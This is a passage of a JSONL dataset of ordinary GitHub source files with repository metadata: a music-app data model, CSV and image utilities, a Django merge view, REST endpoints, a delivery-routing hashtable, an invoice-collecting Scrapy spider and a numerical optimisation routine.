db.ListProperty(db.Key)\n nr_of_followers = db.IntegerProperty(default=0)\n nr_of_followings = db.IntegerProperty(default=0)\n migrated_playlists = db.BooleanProperty(default=False)\n\n last_emailed = db.DateTimeProperty()\n send_new_follower_email = db.BooleanProperty(default=True)\n send_new_subscriber_email = db.BooleanProperty(default=True)\n\n region = db.StringProperty()\n country = db.StringProperty()\n city = db.StringProperty()\n latlon = db.StringProperty()\n\nclass FollowRelation(db.Model):\n \"\"\" user1 follows user2 \"\"\"\n user1 = db.IntegerProperty()\n user2 = db.IntegerProperty()\n\nclass Activity(db.Model):\n \"\"\"\n Loosely follows the http://activitystrea.ms standard\n\n From the spec:\n\n \"In its simplest form, an activity consists of an actor, a verb, an\n object, and a target.\"\n\n Implemented activities:\n\n actor signed up\n actor subscribed to \n actor followed \n \"\"\"\n owner = db.ReferenceProperty(reference_class=YoutifyUser)\n timestamp = db.DateTimeProperty(auto_now_add=True)\n verb = db.StringProperty()\n actor = db.TextProperty()\n type = db.StringProperty()\n target = db.TextProperty()\n\nclass Playlist(db.Model):\n owner = db.ReferenceProperty(reference_class=YoutifyUser)\n json = db.TextProperty()\n private = db.BooleanProperty(default=False)\n tracks_json = db.TextProperty()\n title = db.StringProperty()\n followers = db.ListProperty(db.Key)\n nr_of_followers = db.IntegerProperty(default=0)\n favorite = db.BooleanProperty(default=False)\n\nclass PingStats(db.Model):\n date = db.DateTimeProperty(auto_now_add=True)\n pings = db.IntegerProperty(required=True)\n\nclass ExternalUserTimestamp(db.Model):\n external_user = db.ReferenceProperty(reference_class=ExternalUser)\n user = db.ReferenceProperty(reference_class=YoutifyUser)\n last_viewed = db.DateTimeProperty()\n\nclass AlternativeTrack(db.Model):\n track_id = db.StringProperty(required=True)\n track_type = db.StringProperty(required=True)\n replacement_for_id = db.StringProperty(required=True)\n replacement_for_type = db.StringProperty(required=True)\n vote = db.IntegerProperty(required=True)\n\n\n# HELPERS\n##############################################################################\n\ndef get_current_youtify_user_model():\n return get_youtify_user_model_for(users.get_current_user())\n\ndef get_youtify_user_model_for(user=None):\n return YoutifyUser.all().filter('google_user2 = ',user).get()\n\ndef get_youtify_user_model_by_nick(nick=None):\n return YoutifyUser.all().filter('nickname_lower = ', nick.lower()).get()\n\ndef get_youtify_user_model_by_id_or_nick(id_or_nick):\n if id_or_nick.isdigit():\n return YoutifyUser.get_by_id(int(id_or_nick))\n else:\n return get_youtify_user_model_by_nick(id_or_nick)\n\ndef create_youtify_user_model():\n m = YoutifyUser(google_user2=users.get_current_user(), device=str(random.random()), migrated_playlists=True)\n m.put()\n\n from activities import create_signup_activity # hack to avoid recursive dependency\n create_signup_activity(m)\n\n return m\n\ndef get_followings_for_youtify_user_model(youtify_user_model):\n ret = []\n for follow_relation_model in FollowRelation.all().filter('user1 =', youtify_user_model.key().id()):\n user = YoutifyUser.get_by_id(follow_relation_model.user2)\n ret.append(get_youtify_user_struct(user))\n return ret\n\ndef get_followers_for_youtify_user_model(youtify_user_model):\n ret = []\n for follow_relation_model in FollowRelation.all().filter('user2 =', youtify_user_model.key().id()):\n user = YoutifyUser.get_by_id(follow_relation_model.user1)\n ret.append(get_youtify_user_struct(user))\n return ret\n\ndef get_youtify_user_struct(youtify_user_model, include_private_data=False):\n if youtify_user_model.google_user2:\n email = youtify_user_model.google_user2.email()\n else:\n email = youtify_user_model.google_user.email()\n\n gravatar_email = email\n default_image = 'http://' + os.environ['HTTP_HOST'] + '/images/user.png'\n small_size = 64\n large_size = 208\n user = {\n 'id': str(youtify_user_model.key().id()),\n 'email': None,\n 'lastfm_user_name': youtify_user_model.lastfm_user_name,\n 'dropbox_user_name': youtify_user_model.dropbox_user_name,\n 'displayName': get_display_name_for_youtify_user_model(youtify_user_model),\n 'nr_of_followers': youtify_user_model.nr_of_followers,\n 'nr_of_followings': youtify_user_model.nr_of_followings,\n 'nr_of_playlists': len(youtify_user_model.playlists) + len(youtify_user_model.playlist_subscriptions),\n 'nickname': youtify_user_model.nickname,\n 'firstName': youtify_user_model.first_name,\n 'lastName': youtify_user_model.last_name,\n 'tagline': youtify_user_model.tagline,\n 'smallImageUrl': \"http://www.gravatar.com/avatar/\" + hashlib.md5(gravatar_email.lower()).hexdigest() + \"?\" + urllib.urlencode({'d':default_image, 's':str(small_size)}),\n 'largeImageUrl': \"http://www.gravatar.com/avatar/\" + hashlib.md5(gravatar_email.lower()).hexdigest() + \"?\" + urllib.urlencode({'d':default_image, 's':str(large_size)})\n }\n if include_private_data:\n user['email'] = email\n\n return user\n\ndef get_display_name_for_youtify_user_model(youtify_user_model):\n if youtify_user_model.first_name and youtify_user_model.last_name:\n return youtify_user_model.first_name + ' ' + youtify_user_model.last_name\n elif youtify_user_model.first_name:\n return youtify_user_model.first_name\n elif youtify_user_model.nickname:\n return youtify_user_model.nickname\n if youtify_user_model.google_user2:\n return youtify_user_model.google_user2.nickname().split('@')[0] # don't leak users email\n else:\n return youtify_user_model.google_user.nickname().split('@')[0] # don't leak users email\n\ndef get_url_for_youtify_user_model(youtify_user_model):\n if youtify_user_model.nickname:\n return 'http://www.youtify.com/' + youtify_user_model.nickname\n return 'http://www.youtify.com/users/' + str(youtify_user_model.key().id())\n\ndef get_playlist_structs_for_youtify_user_model(youtify_user_model, include_private_playlists=False):\n playlist_structs = []\n\n for playlist_model in db.get(youtify_user_model.playlists):\n if (not playlist_model.private) or include_private_playlists:\n playlist_structs.append(get_playlist_struct_from_playlist_model(playlist_model))\n\n for playlist_model in db.get(youtify_user_model.playlist_subscriptions):\n if playlist_model is not None:\n playlist_structs.append(get_playlist_struct_from_playlist_model(playlist_model))\n else:\n logging.error('User %s subscribes to deleted playlist' % (youtify_user_model.key().id()))\n\n return playlist_structs\n\ndef get_playlist_overview_structs(youtify_user_model, include_private_playlists=False):\n playlist_structs = []\n owner = get_youtify_user_struct(youtify_user_model)\n\n for playlist_model in db.get(youtify_user_model.playlists):\n if (not playlist_model.private) or include_private_playlists:\n playlist_structs.append({\n 'title': playlist_model.title,\n 'remoteId': playlist_model.key().id(),\n 'isPrivate': playlist_model.private,\n 'owner': owner,\n 'isLoaded': False\n })\n\n for playlist_model in db.get(youtify_user_model.playlist_subscriptions):\n if playlist_model is not None:\n playlist_structs.append({\n 'title': playlist_model.title,\n 'remoteId': playlist_model.key().id(),\n 'isPrivate': playlist_model.private,\n 'owner': get_youtify_user_struct(playlist_model.owner),\n 'isLoaded': False\n })\n\n return playlist_structs\n\ndef get_playlist_structs_by_id(playlist_id):\n playlist_model = Playlist.get_by_id(int(playlist_id))\n return get_playlist_struct_from_playlist_model(playlist_model)\n\ndef get_playlist_struct_from_playlist_model(playlist_model):\n playlist_struct = {\n 'title': playlist_model.title,\n 'videos': playlist_model.tracks_json,\n 'remoteId': playlist_model.key().id(),\n 'isPrivate': playlist_model.private,\n 'owner': get_youtify_user_struct(playlist_model.owner),\n 'followers': [],\n 'favorite': playlist_model.favorite\n }\n\n for key in playlist_model.followers:\n youtify_user_model = db.get(key)\n playlist_struct['followers'].append(get_youtify_user_struct(youtify_user_model))\n\n return playlist_struct\n\ndef get_activities_structs(youtify_user_model, verbs=None, type=None, count=None):\n query = Activity.all()\n\n if youtify_user_model:\n query = query.filter('owner =', youtify_user_model)\n\n if verbs:\n query = query.filter('verb IN', verbs)\n\n if type:\n query = query.filter('type =', type)\n\n query = query.order('-timestamp')\n\n if count is not None:\n query = query.fetch(count)\n\n ret = []\n\n for m in query:\n ret.append({\n 'timestamp': m.timestamp.strftime('%s'),\n 'verb': m.verb,\n 'type': m.type,\n 'actor': m.actor,\n 'target': m.target,\n })\n\n return ret\n\ndef get_settings_struct_for_youtify_user_model(youtify_user_model):\n return {\n 'lastfm_scrobble_automatically': youtify_user_model.lastfm_scrobble_automatically,\n 'send_new_follower_email': youtify_user_model.send_new_follower_email,\n 'send_new_subscriber_email': youtify_user_model.send_new_subscriber_email\n }\n\ndef get_external_user_subscription_struct(m, last_viewed=0):\n return {\n 'type': m.type,\n 'external_user_id': m.external_user_id,\n 'username': m.username,\n 'avatar_url': m.avatar_url,\n 'last_updated': mktime(m.last_updated.timetuple()),\n 'last_viewed': last_viewed,\n }\n\ndef get_external_user_subscriptions_struct_for_youtify_user_model(youtify_user_model):\n ret = []\n\n for external_user_model in db.get(youtify_user_model.external_user_subscriptions):\n last_viewed = ExternalUserTimestamp.all().filter('external_user =', external_user_model).filter('user =', youtify_user_model).get();\n last_viewed_ms = 0\n if last_viewed:\n last_viewed_ms = mktime(last_viewed.last_viewed.timetuple())\n ret.append(get_external_user_subscription_struct(external_user_model, last_viewed_ms))\n\n return ret\n\ndef generate_device_token():\n return str(random.random())\n\ndef get_alternative_struct(alternative_model):\n return {\n 'track_id': alternative_model.track_id,\n 'track_type': alternative_model.track_type,\n 'replacement_for_id': alternative_model.replacement_for_id,\n 'replacement_for_type': alternative_model.replacement_for_type,\n 'vote': alternative_model.vote\n }","repo_name":"youtify/youtify","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":12537,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"84"} +{"seq_id":"13858610444","text":"# coding:utf8\n\"\"\"\n--------------------------------------------------------------------------\n File: readcsv.py\n Auth: zsdostar\n Date: 2018/1/4 21:45\n Sys: Windows 10\n--------------------------------------------------------------------------\n Desc: 读写CSV的常见函数。。就是csv库的方法每次next读一行,写也是可以写一行\n 刘硕老师举的例子的URL已经没了,估计雅虎要亡了吧,\n 结构已经知道了,懒得再弄别的CSV文件了\n--------------------------------------------------------------------------\n\"\"\"\n__author__ = 'zsdostar'\n\nfrom urllib import urlretrieve\n\n# 这个接口已经没有了。。。就随便记录一下吧\nurlretrieve('http://table.finance.yahoo.com/table.csv?s=000001.sz', 'pingan.csv')\n\nimport csv\n\nwith open('pingan.csv', 'rb') as rf:\n # 这个reader是一个迭代器 只能通过next或者for循环进行迭代\n reader = csv.reader(rf)\n with open('pingan_copy.csv', 'wb') as wf:\n writer = csv.writer(wf)\n writer.writerow(reader.next()) # 其实这里的每个next返回的是一个list\n for row in reader:\n if row[0] < '2016-01-01':\n break\n if int(row[5]) >= 50000000:\n writer.writerow(row)\n","repo_name":"MisakaBit/PyFiles","sub_path":"Course-SeniorPy/Chapter6Python读写取各个类型的文件专题(csv,xml,json,xls)/RWcsv.py","file_name":"RWcsv.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"12166942151","text":"import math\n\n\ndef desordem(n, m):\n if (n == 0) or (m == 0):\n return 0\n p1 = n/(n+m)\n p2 = m/(n+m)\n return - p1 * math.log2(p1) - p2 * math.log2(p2)\n\n\n\ndef main():\n n = int(input(\"Indique o nº de objetos do 1º tipo: \"))\n m = int(input(\"Indique o nº de objetos do 2º tipo: \"))\n print(\"A desordem do conjunto é %.2f.\" %(desordem(n, m)))\n\n\nif __name__ == '__main__':\n main()","repo_name":"MiguelFaria57/IPPS-Resolution_of_Problems_using_Python","sub_path":"src/Exercises3/Ex3_7.py","file_name":"Ex3_7.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"12710921943","text":"import cv2\r\nimport numpy as np\r\nimport os\r\nfrom PIL import Image\r\nimport math\r\nimport operator\r\nfrom functools import reduce\r\n\r\n\r\nsrcdir = './data/轿车360'\r\n\r\ndef compare(pic1,pic2):\r\n '''\r\n :param pic1: 图片1路径\r\n :param pic2: 图片2路径\r\n :return: 返回对比的结果\r\n '''\r\n image1 = Image.open(pic1)\r\n image2 = Image.open(pic2)\r\n\r\n histogram1 = image1.histogram()\r\n histogram2 = image2.histogram()\r\n\r\n differ = math.sqrt(reduce(operator.add, list(map(lambda a,b: (a-b)**2,histogram1, histogram2)))/len(histogram1))\r\n\r\n return differ\r\n# image1 = cv2.imread(file1)\r\n# image2 = cv2.imread(file2)\r\n# difference = cv2.subtract(image1, image2)\r\n# result = not np.any(difference) #if difference is all zeros it will return False\r\nfilelist = os.listdir(srcdir) #列出文件夹下所有的目录与文件\r\nfilelist.sort(key=lambda x:int(x[:-4]))\r\na = filelist[1]\r\nlens = len(filelist)\r\nfor i in range(0,lens):\r\n path = os.path.join(srcdir,filelist[i])\r\n path = path.replace('\\\\', '/')\r\n # cur = cv2.imread(path)\r\n for j in range(i+1,lens):\r\n path1 = os.path.join(srcdir,filelist[j])\r\n path1 = path1.replace('\\\\', '/')\r\n # other = cv2.imread(path1)\r\n if os.path.isfile(path) and os.path.isfile(path1):\r\n if compare(path,path1) == 0:\r\n print(path1)\r\n os.remove(path1)\r\n\r\n","repo_name":"Maplesotrys/recapphoto_detect","sub_path":"detectsame.py","file_name":"detectsame.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"25006180336","text":"from contextlib import suppress\nimport re\n\ndef add(string):\n\tsplitted_string = re.split(r'[,\\n]', string)\n\n\toutcome = 0\n\tfor string_number in splitted_string:\n\t\twith suppress(ValueError):\n\t\t\toutcome += float(string_number)\n\treturn '{:.0f}'.format(outcome)\n\t","repo_name":"thehyve/coding-dojo","sub_path":"dojo-3-string-calc/string_calc.py","file_name":"string_calc.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"30396109051","text":"from typing import List\n\nfrom asyncpg import exceptions\n\nfrom . import utils\nfrom .tables import Question\n\n\nasync def save_qestions(questions: List[dict]) -> None:\n repeated_questions = 0\n for question in questions:\n try:\n new_question = Question(\n {\n Question.number: question['id'],\n Question.text: question['question'],\n Question.answer: question['answer'],\n }\n )\n await new_question.save()\n except exceptions.UniqueViolationError:\n repeated_questions += 1\n\n if repeated_questions:\n await utils.fetch_questions(questions_num=repeated_questions)\n\n\nasync def get_questions_from_db(limit: int) -> List[dict]:\n questions = await Question.select(\n Question.number, Question.text, Question.answer).order_by(\n Question.created_at, ascending=False).limit(limit)\n return questions\n","repo_name":"CaDiBob/quiz","sub_path":"backend/questions/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"39890996832","text":"from django.shortcuts import render, redirect\nfrom django.views.decorators.http import require_POST\nfrom django.urls import reverse\nfrom django.http import HttpResponseBadRequest\nfrom django.contrib import messages\nfrom ..models import Person\nfrom ...merge import compute_diff, merge\nfrom opencivicdata.core.models import Jurisdiction\n\n\ndef merge_tool(request, jur_id):\n people = Person.objects \\\n .filter(memberships__organization__jurisdiction__id=jur_id) \\\n .distinct()\n jur_name = Jurisdiction.objects.get(id=jur_id).name\n if request.method == 'POST':\n person1 = request.POST['person1']\n person2 = request.POST['person2']\n\n if person1 == person2:\n messages.add_message(request, messages.ERROR,\n 'Cannot merge person with themselves.',\n )\n person1 = Person.objects.get(pk=person1)\n person2 = Person.objects.get(pk=person2)\n\n diff = compute_diff(person1, person2)\n\n return render(request, 'opencivicdata/admin/merge.html',\n {'people': people,\n 'person1': person1,\n 'person2': person2,\n 'diff': diff,\n 'jur_name': jur_name,\n })\n else:\n return render(request, 'opencivicdata/admin/merge.html',\n {'people': people, 'jur_name': jur_name})\n\n\n@require_POST\ndef merge_confirm(request):\n person1 = request.POST['person1']\n person2 = request.POST['person2']\n if person1 == person2:\n return HttpResponseBadRequest('invalid merge!')\n\n person1 = Person.objects.get(pk=person1)\n person2 = Person.objects.get(pk=person2)\n\n merge(person1, person2)\n\n messages.add_message(request, messages.INFO,\n 'merged {} with {}'.format(person1.id, person2.id)\n )\n\n return redirect(reverse('admin:core_person_change', args=(person1.id,)))\n","repo_name":"GovHawkDC/python-opencivicdata","sub_path":"opencivicdata/core/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"84"} +{"seq_id":"7130802240","text":"from HashTable import ChainingHashTable\r\nimport csv\r\n\r\n\r\n# creates 27-key hashtable and reads in data from location csv file\r\n# space-time complexity: O(N)\r\ndef create_location_table():\r\n loc_table = ChainingHashTable(27)\r\n with open('Distance Table.csv', newline='') as csvfile:\r\n reader = csv.reader(csvfile)\r\n next(reader)\r\n i = 0\r\n for row in reader:\r\n loc_id = i\r\n loc_description = row[0]\r\n distances = row[1:]\r\n\r\n key = loc_id\r\n value = loc_description, distances\r\n\r\n loc_table.insert(key, value)\r\n i += 1\r\n return loc_table\r\n\r\n\r\n# creates 27-key hashtable to associate packages with locations\r\n# space-time complexity: O(N)\r\ndef create_loc_package_table(loc_table, package_table):\r\n loc_pack_table = ChainingHashTable(27)\r\n for location in loc_table.table:\r\n for package in package_table.table:\r\n # checks matching street addresses between loc_table & package_table and populates loc_pack_table with\r\n # the resulting integers. Each location ID indexes a list of matching package IDs.\r\n if location[0][1][0] == package[0][1][1]:\r\n loc_pack_table.table[int(location[0][0])].append(int(package[0][0]))\r\n return loc_pack_table\r\n","repo_name":"danaklowe/TSP-Deliveries","sub_path":"Location.py","file_name":"Location.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"19838216982","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime as dt\nimport json\nimport os\nimport sys\nimport time\nimport urllib.parse\nimport uuid\n\nfrom scrapy import signals\nfrom scrapy.http import FormRequest, Request\nfrom scrapy_splash import SplashRequest, SplashFormRequest\nfrom websocket import create_connection\n\nfrom brobot_bots.external_modules.config import access_settings as config\nfrom brobot_bots.external_modules.external_functions import CustomSpider\nfrom brobot_bots.external_modules.lua_script import script, script_10_sec_wait\nfrom brobot_bots.items import BrobotBotsItem\n\n\npath = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\nif not path in sys.path:\n sys.path.insert(1, path)\n#del path\n\n\nclass telecom_vivo_movel_spider(CustomSpider):\n # required scraper name\n name = \"telecom_vivo_movel\"\n\n start_url = 'https://mve.vivo.com.br'\n\n # user and password for splash\n http_user = config['SPLASH_USERNAME']\n http_pass = config['SPLASH_PASSWORD']\n\n @classmethod\n def from_crawler(cls, crawler, *args, **kwargs):\n \"\"\"Rewriting of the spider_idle function to yield result after spider closed.\"\"\"\n\n spider = super(telecom_vivo_movel_spider, cls).from_crawler(\n crawler, *args, **kwargs)\n crawler.signals.connect(spider.get_final_result, signals.spider_idle)\n return spider\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n # internal arguments\n self.navigation_constraints = [\n item['cnpj'] for item in self.navigation_constraints] \\\n if self.navigation_constraints else []\n\n def start_requests(self):\n frm_data = {\"email\": self.e_mail,\n \"password\": self.senha}\n\n login_url = self.start_url + '/login/sign_in'\n yield SplashFormRequest(login_url, formdata=frm_data,\n callback=self.sign_in_me,\n errback=self.errback_func,\n endpoint='execute',\n cache_args=['lua_source'],\n args={'lua_source': script_10_sec_wait},\n dont_filter=True)\n\n def sign_in_me(self, response):\n error_message = response.selector.xpath(\n \"//span[contains(normalize-space(),'E-mail e/ou senha incorretos')]/text()\").get()\n if error_message:\n error_msg = {\"error_type\": \"WRONG_CREDENTIALS\",\n \"details\": error_message}\n self.errors.append(error_msg)\n self.logger.warning(error_msg)\n return\n\n dashboard_url = \"https://mve.vivo.com.br/dashboard\"\n yield Request(dashboard_url, callback=self.get_dashbord,\n cookies=response.data['cookies'],\n meta={'cookies': response.data['cookies']},\n dont_filter=True)\n\n def get_dashbord(self, response):\n print(response.url)\n\n documents = response.selector.xpath(\"//li[@data-documentnumber]/@data-documentnumber\").extract()\n for document in documents:\n if not self.navigation_constraints or \\\n document in self.navigation_constraints:\n current_time = str(time.time() * 1000)\n query_str = {\n 'documentNumber': document,\n 'customerPlatformType': 'mobile',\n 'offset': '0',\n 'limit': '20',\n 'ts': current_time}\n\n invoices_url = \"https://mve.vivo.com.br/module/invoices/list/summary?\" + urllib.parse.urlencode(query_str)\n yield Request(invoices_url, headers={'x-document-number': document},\n callback=self.get_invoices,\n cookies=response.meta['cookies'],\n meta={'cookies': response.meta['cookies'],\n 'document': document},\n dont_filter=True)\n\n def get_invoices(self, response):\n cookies = response.meta['cookies']\n document = response.meta['document']\n cookie_string = \"; \".join([\"{}={}\".format(cookie['name'], cookie['value']) for cookie in cookies])\n\n json_response = json.loads(response.text)\n print(json_response)\n # add to result if not empty\n if json_response['due'] or json_response['paid'] or \\\n json_response['in_arrears'] or json_response['inactive']:\n self.result[document] = json_response\n\n if self.get_files:\n for invoice_status in ['due', 'in_arrears']:\n due_invoices = json_response[invoice_status]\n for invoice in due_invoices:\n billing_info = invoice['invoice']\n current_time = str(time.time() * 1000)\n due_date = dt.strptime(billing_info['paymentDueDate'], \"%Y-%m-%d\")\n account_status = invoice['billingAccountStatus']\n if account_status != \"cancelled\" and self.start_date <= due_date <= self.end_date:\n bills = [{\n \"billMonth\": invoice['billMonth'],\n \"billYear\": invoice['billYear'],\n \"billingAccountId\": invoice['billingAccountId'],\n \"cycleCode\": invoice['cycleCode'],\n \"dateFinalCycle\": invoice['dateFinalCycle'],\n \"documentId\": document, # document number\n \"originalInvoiceRefDueDate\": billing_info['paymentDueDate'],\n \"paymentStatus\": [billing_info['paymentStatus']],\n \"type\": \"detailed-invoice\"}]\n\n file_data = {\n \"filename\": document, # document number\n \"info\": \"{account_id}\\n - {due_date}\\n - Detalhada (.pdf)\".format(\n account_id=invoice['billingAccountId'], due_date=due_date.strftime(\"%d/%m/%Y\")),\n \"id\": document + current_time,\n \"documentNumber\": document, # document number\n \"type\": \"detailed-invoice\",\n \"fileFormat\": \"detailed-invoice\",\n \"requestFrom\": \"grid-invoices\",\n \"paymentStatusAnalytics\": [billing_info['paymentStatus']],\n \"downloadId\": document + current_time,\n \"status\": 2,\n \"bills\": bills,\n \"download\": bills}\n\n ws = create_connection(\"wss://mve.vivo.com.br/wss/file\",\n cookie=cookie_string)\n ws.send(json.dumps(file_data))\n ws_result = json.loads(ws.recv())\n ws.close()\n\n if ws_result.get('url'):\n pdf_url = \"https://mve.vivo.com.br{url_path}&vivo_download_token={download_token}\".format(\n url_path=ws_result['url'], download_token=ws_result['downloadToken'])\n print(pdf_url)\n yield Request(pdf_url, callback=self.save_pdf,\n meta={'document': document,\n 'invoice_status': invoice_status,\n 'invoice': invoice},\n cookies=cookies, dont_filter=True)\n\n def save_pdf(self, response):\n \"\"\"Function to save PDF for uploading to s3 bucket.\"\"\"\n\n if response.status != 200 and self.file_retries > 0:\n self.file_retries -= 1\n yield response.request.replace(dont_filter=True)\n return\n elif response.status != 200:\n return\n else:\n # refresh\n self.file_retries = 3\n\n # get metadata\n file_type = \"__boleto__\"\n invoice_status = response.meta['invoice_status']\n document = response.meta['document']\n\n # options to save pdf\n file_id = str(uuid.uuid4())\n filename = \"{file_id}.pdf\".format(file_id=file_id)\n file_path = os.path.join(path, \"downloads\", self.scrape_id, filename)\n with open(file_path, 'wb') as f:\n f.write(response.body)\n\n # upload pdf to s3 and call the webhook\n self.upload_file(file_id)\n\n # update values in result\n document_value = self.result[document]\n [item.update({\n file_type: {\n \"file_id\": file_id}\n }) for item in document_value[invoice_status]\n if item == response.meta['invoice']]\n self.result.update({document: document_value})\n\n def get_final_result(self, spider):\n \"\"\"Will be called before spider closed\n Used to save data_collected result.\"\"\"\n\n # stop crawling after yeild_item called\n if not self.result_received:\n # push to webhook\n self.data = {\n 'scrape_id': self.scrape_id,\n 'scraper_name': self.name,\n 'files_count': self.files_count,\n 'screenshots_count': self.screenshots_count,\n 'cnpj': self.cnpj}\n self.data.update({'result': self.result})\n if self.errors:\n self.data.update({'errors': self.unique_list(self.errors)})\n webhook_file_path = os.path.join(\n path, \"downloads\", self.scrape_id,\n '{cnpj}-data_collected.json'.format(cnpj=self.cpf_cnpj))\n self.data_collected(self.data, webhook_file_path)\n # return item for scrapinghub\n self.result_received = True\n req = Request(self.start_url,\n callback=self.yield_item,\n errback=self.yield_item, dont_filter=True)\n self.crawler.engine.crawl(req, spider)\n\n def yield_item(self, response):\n \"\"\"Function is using to yield Scrapy Item\n Required for us to see the result in ScrapingHub\"\"\"\n item = BrobotBotsItem()\n item.update(self.data)\n yield item\n","repo_name":"geeone/scrapy-spiders","sub_path":"brobot_bots/spiders/telecom_vivo_movel_spider.py","file_name":"telecom_vivo_movel_spider.py","file_ext":"py","file_size_in_byte":10416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"19158838489","text":"from rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom knowledge.serializers import CategorySerializer, KnowledgeSerializer\nfrom knowledge.models import Category, Knowledge\nfrom django.core.paginator import Paginator\nimport json\nfrom rest_framework import status\n\n\n# Create your views here.\nclass CategoriesView(APIView):\n def post(self, request):\n categories = Category.objects.all()\n serializer = CategorySerializer(categories, many=True)\n return Response({\n \"status\": 'success',\n \"articles\": serializer.data,\n })\n\n\nclass EditCategoryView(APIView):\n def post(self, request):\n\n # received_json_data = json.loads(request.body.decode(\"utf-8\"))\n received_json_data = request.data\n\n category_id = int(received_json_data['id'])\n name = str(received_json_data['name'])\n comment = str(received_json_data['comment'])\n description = str(received_json_data['description'])\n\n if category_id == 0:\n category = Category(name=name, comment=comment, description=description)\n else:\n category = Category.objects.get(id=category_id)\n category.name = name\n category.comment = comment\n category.description = description\n\n category.save()\n\n return Response({\n \"status\": 'success',\n })\n\n\nclass GetKnowledgeView(APIView):\n def post(self, request):\n\n # received_json_data = json.loads(request.data)\n received_json_data = request.data\n\n page_num = int(received_json_data['page'])\n category = int(received_json_data['category'])\n\n if page_num < 1:\n page_num = 1\n\n knowledge_objects = Knowledge.objects\n\n if category > 0:\n knowledge_objects = knowledge_objects.filter(category=category)\n else:\n knowledge_objects = knowledge_objects.all()\n\n paginate = Paginator(knowledge_objects, 5)\n\n page = paginate.page(page_num)\n\n knowledge = page.object_list\n\n serializer = KnowledgeSerializer(knowledge, many=True)\n\n return Response({\n \"status\": 'success',\n \"knowledge\": serializer.data,\n \"page\": page_num,\n \"num_pages\": paginate.num_pages,\n })\n\n\nclass GetKnowledgeDetailView(APIView):\n def post(self, request):\n\n received_json_data = request.data\n\n knowledge_id = int(received_json_data['knowledge_id'])\n\n result = None\n if knowledge_id > 0:\n knowledge = Knowledge.objects.get(id=knowledge_id)\n serializer = KnowledgeSerializer(knowledge)\n result = serializer.data\n\n return Response({\n \"status\": 'success',\n \"knowledge\": result,\n \"received_json_data\": received_json_data,\n })\n\n\nclass SaveKnowledgeDetailView(APIView):\n def post(self, request):\n\n received_json_data = request.data\n\n knowledge_id = int(received_json_data['knowledge_id'])\n category_id = int(received_json_data['category_id'])\n short_desc = str(received_json_data['short_description'])\n text = str(received_json_data['knowledge_text'])\n\n category = Category.objects.get(id=category_id)\n\n if not category:\n return Response({\n \"status\": 'fail',\n })\n\n result = None\n saved_knowledge_id = 0\n if knowledge_id == 0:\n knowledge = Knowledge()\n else:\n knowledge = Knowledge.objects.get(id=knowledge_id)\n\n if knowledge:\n knowledge.category = category\n knowledge.short_desc = short_desc\n knowledge.text = text\n knowledge.save()\n saved_knowledge_id = knowledge.id\n # serializer = KnowledgeSerializer(knowledge)\n\n return Response({\n \"status\": 'success',\n \"knowledge_id\": saved_knowledge_id,\n # \"serializer\": serializer,\n \"received_json_data\": received_json_data,\n })\n","repo_name":"konstcos/knowledge_base","sub_path":"api_v1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"16817126399","text":"from math import sqrt\nfrom numpy.linalg import norm\nfrom ..base import less_equal\nimport numpy as np\n\n#计算海森矩阵与d的矩阵乘法\ndef hessian_dot(X_T_pos,X_T_neg,X_pos,X_neg,D,d,n_pos_free,hess_dot,d_index=None):\n\tif d_index is None:\n\t\td_index = n_pos_free\n\thess_dot[:n_pos_free] = X_T_pos.dot(D*X_pos.dot(d[:d_index])) - X_T_pos.dot(D*X_neg.dot(d[d_index:]))\n\thess_dot[n_pos_free:] = -X_T_neg.dot(D*X_pos.dot(d[:d_index])) + X_T_neg.dot(D*X_neg.dot(d[d_index:]))\n\n#共轭梯度算法求解论文式(53),见论文Algorithm 7\ndef CG(X_T_pos,X_T_neg,X_pos,X_neg,D,gradient_free,gradient_qd_free,hess_dot_d,d,n_pos_free,region_size,tol):\n\tb = -gradient_qd_free\n\tx,pre_x = np.zeros_like(d),np.zeros_like(d)\n\tr,p = b.copy(),b.copy() \n\tnorm2_square_r = np.sum(r**2)\n\tstop_criterion = tol**2*np.sum(gradient_free**2)\n\t\n\tA_dot_p = np.empty_like(d)\n\tfor _ in range(d.shape[0]):\n\t\thessian_dot(X_T_pos,X_T_neg,X_pos,X_neg,D,p,n_pos_free,A_dot_p)\n\t\talpha = norm2_square_r/np.dot(p,A_dot_p)\n\t\t\n\t\tx += alpha*p\n\t\tif norm(x+d)>region_size:\n\t\t\ta,b,c = np.sum(p**2),2*np.dot(pre_x+d,p),np.sum((pre_x+d)**2)-region_size**2\n\t\t\tdelta = b**2-4*a*c\n\t\t\tgamma = max((-b+sqrt(delta))/(2*a),(-b-sqrt(delta))/(2*a)) if delta>=0 else 0\n\t\t\treturn pre_x+gamma*p,True\n\t\tpre_x = x.copy()\n\t\t\n\t\tr -= alpha*A_dot_p\n\t\tnorm2_square_r_ = np.sum(r**2)\n\t\tif less_equal(norm2_square_r_,stop_criterion):\n\t\t\tbreak\n\n\t\tbeta = 